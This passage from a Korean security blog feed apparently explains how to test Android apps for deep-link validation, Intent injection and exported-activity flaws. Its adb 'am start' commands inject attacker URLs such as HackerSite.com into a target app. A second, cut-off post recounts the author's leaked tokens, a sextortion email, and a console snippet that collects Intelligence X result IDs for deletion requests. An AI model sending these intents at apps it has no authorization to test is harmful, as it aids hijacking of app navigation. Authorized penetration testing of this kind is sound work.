&lt;p data-ke-size=&quot;size16&quot;&gt;3. 검증 부재 핵심 원인&lt;br /&gt;- 입력 값 검증 누락 - 화이트리스트 및 블랙리스트 미구현&lt;br /&gt;- Intent 필드 (action, data, extra) 에 대한 검증 미구현&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 세 가지가 공통점인데, 해당 취약점에 대한 가장 큰 공통점은&amp;nbsp; 바로 컴포넌트간 통신의 메커니즘이 동일한 방법으로 사용된다는 것이다. 따라서 셋다&amp;nbsp;&lt;b&gt;adb shell am start ~~&amp;nbsp;&lt;/b&gt;형식으로 취약점에 대한 검증이 가능하며, 예시는 다음과 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. Activity 실행 검증 취약점 검증 코드:&lt;/p&gt;
&lt;pre id=&quot;code_1749394923164&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -n $package/$actName&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. Intent Injection 취약점 검증 코드:&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1749395092695&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -n $package/$actName --es url &quot;http://HackerSite.com&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 딥링크 검증 미흡 취약점 검증 코드:&lt;/p&gt;
&lt;pre id=&quot;code_1749395148940&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -a android.intent.action.VIEW -d &quot;testingapp://path?url=http://HackerSite.com&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;세 개다 앱을 실행시키는 것을 목적으로 코드가 작성되고 수행된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Acitivity 실행 검증 취약점은 직접적으로 패키지명과 Activitiy 명을 호출해서, Intent Injection 은 직접 호출하며&amp;nbsp;&lt;b&gt;HackerSite.com&lt;/b&gt; 을 불러오는 것으로, 그리고 딥링크 검증 미흡 취약점의 경우 안드로이드 Intent action VIEW 를 실행하여 어플리케이션의 딥링크&amp;nbsp;&lt;b&gt;testingapp&amp;nbsp;&lt;/b&gt;을 호출해 실행하게된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그러나 몇 가지 다른 점이 있는 것을 알 수 있는데, .다른 점은 다음과 같다.&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;구분&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Intent Injection&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;딥링크 검증 미흡&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Activity 실행 우회&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;공격 벡터&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;다른 앱 &amp;rarr; 타겟 앱&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;딥링크 URI 호출&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Activity 직접 실행&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;주요 영향 범위&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Intent 수신 컴포넌트&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;딥링크 핸들러&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;모든 Exported 컴포넌트&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;대표 시나리오&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;WebView Javascript 인터페이스 악용&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;intent:// 체계 미검증&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;android:exported=true&amp;nbsp;&lt;br /&gt;과다 설정&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;검증 포인트&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Intent.get*()&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;URI 파라미터/구조 분석&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;컴포넌트 노출 필요성 검토&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Intent Injection 의 경우 Activity 실행 우회 취약점과 딥링크 검증 미흡 취약점은 앱이 외부 - 악성 앱이나 adb 등에서 전달된 Intent 및 Activity 가 직접적으로 수행되어 실행되는 것과 다르게 intent 실행 컴포넌트로 부터 딥링크(URI) 값이 전달되어 간접적으로 실행된다는 점에서 우선 다르다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;또한 Intent Injection 은 Intent 객체 자체의 속성 및 Extra 데이터 조작, Activity 실행 우회 취약점은 Activity 객체 속성 및 Extra 데이터 조작에서 가능하나 딥링크 검증 미흡 취약점은 URI(딥링트) 파라미터 조작 및 전달, 그리고 외부 링크를 통한 진입에서부터 조작이 되는 점이다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위에서 간단하게 (?) 비슷한 세개의 취약점에 대해 공통점과 차이점을 서술했고, 이제 딥링크 취약점은 어떻게 수행하여 검증할 수 있는지 확인해보자.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;1298&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bJZu7U/btsOtvpQ1xL/Sv1Tp4VD4aNKFKg2vt0Ep0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bJZu7U/btsOtvpQ1xL/Sv1Tp4VD4aNKFKg2vt0Ep0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bJZu7U/btsOtvpQ1xL/Sv1Tp4VD4aNKFKg2vt0Ep0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbJZu7U%2FbtsOtvpQ1xL%2FSv1Tp4VD4aNKFKg2vt0Ep0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;731&quot; height=&quot;1298&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;1298&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;대상 앱을 디컴파일 해보거나 앱 패키지 내 AndroidManifext.xml 파일을 확인해보면 Exported 값이 true 로 설정된 Activity 를 확인이 가능하며, 사용가능한 intent 들과 딥링크 (URI) 정보에 대한 확인이 가능하다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;829&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dCKvZv/btsOs2OYTj9/qS1nqRklPxuczpp193vLQ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dCKvZv/btsOs2OYTj9/qS1nqRklPxuczpp193vLQ0/img.png&quot; data-alt=&quot;AndroidManifest.xml&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dCKvZv/btsOs2OYTj9/qS1nqRklPxuczpp193vLQ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdCKvZv%2FbtsOs2OYTj9%2FqS1nqRklPxuczpp193vLQ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;959&quot; height=&quot;829&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;829&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;AndroidManifest.xml&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;노출된 Intent 값, 그리고 URI 값을 이용하여 해당 앱의 실행 여부 체킹이 가능하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;호출 코드:&lt;/p&gt;
&lt;pre id=&quot;code_1749401008166&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -a android.intent.action.VIEW -d &quot;[DeepLinkURI]://path?url=https://HackerSites&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1749401072300&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -n [TargetApplicationID]/[TargetApplicationActivity] -d &quot;[ApplicationURI]://path?url=https://HackerSites&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1749401092313&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -a android.intent.action.VIEW -d &quot;[DeepLinkURI]://Test&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;가장 간단한 딥링크 실행은 세 번째 명령이며, 첫 번째 코드는 임의 Intent 경로를 이용한 딥링크 호출, 그리고 두 번째 명령의 경우 실행 가능 Activity 를 이용한 딥링크 호출 명령이다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qLHQW/btsOrrvYMGu/vogdOXzpSjiWw7AmqHcv10/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qLHQW/btsOrrvYMGu/vogdOXzpSjiWw7AmqHcv10/img.png&quot; data-alt=&quot;adb shell am start -a android.intent.action.VIEW -d &amp;quot;[DeepLinkURI]://AttackerSite.kr/&amp;quot;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qLHQW/btsOrrvYMGu/vogdOXzpSjiWw7AmqHcv10/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqLHQW%2FbtsOrrvYMGu%2FvogdOXzpSjiWw7AmqHcv10%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;835&quot; height=&quot;628&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;adb shell am start -a android.intent.action.VIEW -d &quot;[DeepLinkURI]://AttackerSite.kr/&quot;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 명령을 이용하여 앱이 실행 여부를 이용하여 딥링크 임의 실행 여부를 파악할 수 있으며, 작성한 값 - &lt;b&gt;redsec.kaiht.kr/WebServer/&lt;/b&gt; 으로 앱으로 전달하는 것을 확인할 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1108&quot; data-origin-height=&quot;256&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dNkbJ3/btsOsnGlXXB/297EdKwUj26rihtglv9bD1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dNkbJ3/btsOsnGlXXB/297EdKwUj26rihtglv9bD1/img.png&quot; data-alt=&quot;AndroidStudio 내 Logcat&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dNkbJ3/btsOsnGlXXB/297EdKwUj26rihtglv9bD1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdNkbJ3%2FbtsOsnGlXXB%2F297EdKwUj26rihtglv9bD1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1108&quot; height=&quot;256&quot; data-origin-width=&quot;1108&quot; data-origin-height=&quot;256&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;AndroidStudio 내 Logcat&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;1292&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/oiyD9/btsOrVjhbIy/5kT8oE6DVO3HVH0jhEWXk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/oiyD9/btsOrVjhbIy/5kT8oE6DVO3HVH0jhEWXk1/img.png&quot; data-alt=&quot;Target Application 실행 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/oiyD9/btsOrVjhbIy/5kT8oE6DVO3HVH0jhEWXk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoiyD9%2FbtsOrVjhbIy%2F5kT8oE6DVO3HVH0jhEWXk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;731&quot; height=&quot;1292&quot; data-origin-width=&quot;731&quot; data-origin-height=&quot;1292&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Target Application 실행 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필자 본인이 딥링크 요청 시, 전달하는 값은 본인의 웹사이트 URL 값이나 해당 값에 대한 처리 구간 별도로 존재하지 않아 해당 사이트로 직접적인 요청이 가지 않는 것을 확인하였다. 본 앱을 이용한 임의 사이트 접근 등에 대해서는 이후 별도 게시글을 통해 정리해볼 예정이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- Android 모바일 딥링크 점검 도구 참고:&lt;/p&gt;
&lt;figure id=&quot;og_1767775862876&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - KaiHT-Ladiant/DeepLinkPentest&quot; data-og-description=&quot;Contribute to KaiHT-Ladiant/DeepLinkPentest development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/KaiHT-Ladiant/DeepLinkPentest&quot; data-og-url=&quot;https://github.com/KaiHT-Ladiant/DeepLinkPentest&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/pJQYr/hyZRcfEuLD/HzqaZz6usLXcqMCaJMVACK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/sUou9/hyZQHFsMMH/S8A32ydzLTLhTywEzaNmV0/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/KaiHT-Ladiant/DeepLinkPentest&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/KaiHT-Ladiant/DeepLinkPentest&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/pJQYr/hyZRcfEuLD/HzqaZz6usLXcqMCaJMVACK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/sUou9/hyZQHFsMMH/S8A32ydzLTLhTywEzaNmV0/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - KaiHT-Ladiant/DeepLinkPentest&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Contribute to KaiHT-Ladiant/DeepLinkPentest development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Tools/Android</category>
      <category>android deeplink</category>
      <category>deeplink check</category>
      <category>pentest deeplink</category>
      <category>딥링크 취약점</category>
      <category>딥링크 취약점과 intent injection 취약점 차이</category>
      <category>안드로이드 딥링크</category>
      <category>안드로이드 딥링크 취약점 점검</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/78</guid>
      <comments>https://kaisec.tistory.com/entry/Run-DeepLink-Pentesting-Android#entry78comment</comments>
      <pubDate>Mon, 9 Jun 2025 02:06:45 +0900</pubDate>
    </item>
    <item>
      <title>Intelligence X Extraction of My Code</title>
      <link>https://kaisec.tistory.com/entry/Intelligence-X-Extraction-of-My-Code</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;899&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/q3jUD/btsNRRg8H5l/ClzaPpU7h8KN9I1DfXSFg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/q3jUD/btsNRRg8H5l/ClzaPpU7h8KN9I1DfXSFg0/img.png&quot; data-alt=&quot;IntelligenceX Service&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/q3jUD/btsNRRg8H5l/ClzaPpU7h8KN9I1DfXSFg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fq3jUD%2FbtsNRRg8H5l%2FClzaPpU7h8KN9I1DfXSFg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1200&quot; height=&quot;899&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;899&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;IntelligenceX Service&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;회사에서 딥웹 내 노출된 본인의 정보를 추출해주는 &quot;IntelligenceX&quot; 라는 서비스를 알게되었다.&lt;br /&gt;해당 서비스는 찾으려는 이름, 이메일, 전화번호 등을 이용하여 딥웹 내 업로드되어있거나 노출된 정보를 찾아주는 서비스로 OSINT 정보를 긁어와 보여준다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1159&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dc77PA/btsNS7C4z5q/KKgk7UvTqOkT5yOZ9rd8P0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dc77PA/btsNS7C4z5q/KKgk7UvTqOkT5yOZ9rd8P0/img.png&quot; data-alt=&quot;Intelligence X 내 도출된 유출된 데이터&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dc77PA/btsNS7C4z5q/KKgk7UvTqOkT5yOZ9rd8P0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdc77PA%2FbtsNS7C4z5q%2FKKgk7UvTqOkT5yOZ9rd8P0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1159&quot; height=&quot;1005&quot; data-origin-width=&quot;1159&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Intelligence X 내 도출된 유출된 데이터&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서비스 자체가 궁금해서 본인이 자주 사용하고 있었고, 중요 서비스들에서 사용하는 이메일 정보로 검색해보았더니 굉장히 크리티컬 한(...) 정보가 노출된 것을 확인하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아무래도 파일을 잘못 받거나 해서 감염된 PC로 인하여 파일들이 노출된 것으로 보이는데, 해당 파일 내엔 본인 PC의 데스크탑 환경의 스크린샷(...) 이 포함된 유출된 Steam 토큰, Discord 토큰 등을 확인할 수 있었다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1250&quot; data-origin-height=&quot;1049&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ucP2T/btsNSanmElT/Qv8LLDdZ1rWvYBawOVC161/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ucP2T/btsNSanmElT/Qv8LLDdZ1rWvYBawOVC161/img.png&quot; data-alt=&quot;피해 확인 전 해커가 보낸 이메일 원문&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ucP2T/btsNSanmElT/Qv8LLDdZ1rWvYBawOVC161/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FucP2T%2FbtsNSanmElT%2FQv8LLDdZ1rWvYBawOVC161%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1250&quot; height=&quot;1049&quot; data-origin-width=&quot;1250&quot; data-origin-height=&quot;1049&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;피해 확인 전 해커가 보낸 이메일 원문&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 메일 내용을 보면 알겠지만, 노출된 본인 이메일 정보로 해커가 비밀번호를 찾았다며 돈을 내놓지 않으면 PC의 WebCam 으로 녹화된&amp;nbsp;&lt;b&gt;개인 시간을 보내고 있는 영상을 뿌리겠다고 협박&lt;/b&gt;하고 있다. 본인 PC의 경우 모니터 중 1대에 카메라가 존재하여 헉 했을 지도 모른다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;50시간 이내 돈을 보내라고 협박하고 있는데, 해당 메일을 읽은 시점이 이미 50시간이 한참 지난 후라 어떻게 나올지는 미지수. 본 메일을 확인한 시간이 2달 정도 지난 시점인 대다가 Intelligence X 로 본인의 피해 사실을 알게되어 Intelligence X 를 통하여 본 내용을 삭제하고자 하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 본인의 데이터 중 중요한 데이터의 경우 Steam/Discord 로그인 토큰도 있었지만, PC내 저장된 크롬 Profile과 PC 내&amp;nbsp;&lt;b&gt;취약점 보고서&amp;nbsp;&lt;/b&gt;등 민감한 파일들이 존재하여 PC 포멧 및 삭제를 수행하고, 이후에 Intelligence X 내 데이터 삭제가 필요하였다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1141&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bbjPu7/btsNS9VbFql/t1jIlR4AYlAajWDCMCrFVK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bbjPu7/btsNS9VbFql/t1jIlR4AYlAajWDCMCrFVK/img.png&quot; data-alt=&quot;https://intelx.io/abuse&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bbjPu7/btsNS9VbFql/t1jIlR4AYlAajWDCMCrFVK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbbjPu7%2FbtsNS9VbFql%2Ft1jIlR4AYlAajWDCMCrFVK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1141&quot; height=&quot;1005&quot; data-origin-width=&quot;1141&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://intelx.io/abuse&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Intelligence X 에서 확인된 데이터들에 대한 삭제 요청이 가능한데, 이때 검색으로 도출되는 Name, Company, Email 을 &lt;b&gt;검색한 값 대로&amp;nbsp;&lt;/b&gt;&lt;b&gt;작성&lt;/b&gt;하여 요청해야 삭제를 해주는 대다가, 검색으로 도출된 정보들에 대한 세부정보 확인이 &lt;b&gt;IP당 30건으로 제한&lt;/b&gt;되어 있어 모든 컨텐츠에 대한 삭제 요청이 힘들다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이를 해결하기 위해, javascript 를 이용한 검색 도출 화면에서의 모든 값 (ID) 을 가져오는 코드를 작성해보았다.&lt;/p&gt;
&lt;pre id=&quot;code_1746931522373&quot; class=&quot;javascript&quot; data-ke-language=&quot;javascript&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;const elements = document.querySelectorAll('[data-id]');
const dataIds = Array.from(elements).map(element =&amp;gt; element.getAttribute('data-id'));
console.log(dataIds);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 코드의 사용 순서는 다음과 같다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;Intelligence X 내 접속 후, 임의 문자열 검색을 수행&lt;/li&gt;
&lt;li&gt;검색된 데이터들 모두 조회할 수 있도록 검색 목록 끝까지 드래그/PageDown 수행&lt;/li&gt;
&lt;li&gt;웹 브라우저 개발자 도구에서 콘솔 기능 실행&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1159&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cvrro9/btsOlCpLlZn/Vv3GeCWTPIhwN7KvV0bKSk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cvrro9/btsOlCpLlZn/Vv3GeCWTPIhwN7KvV0bKSk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cvrro9/btsOlCpLlZn/Vv3GeCWTPIhwN7KvV0bKSk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcvrro9%2FbtsOlCpLlZn%2FVv3GeCWTPIhwN7KvV0bKSk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; 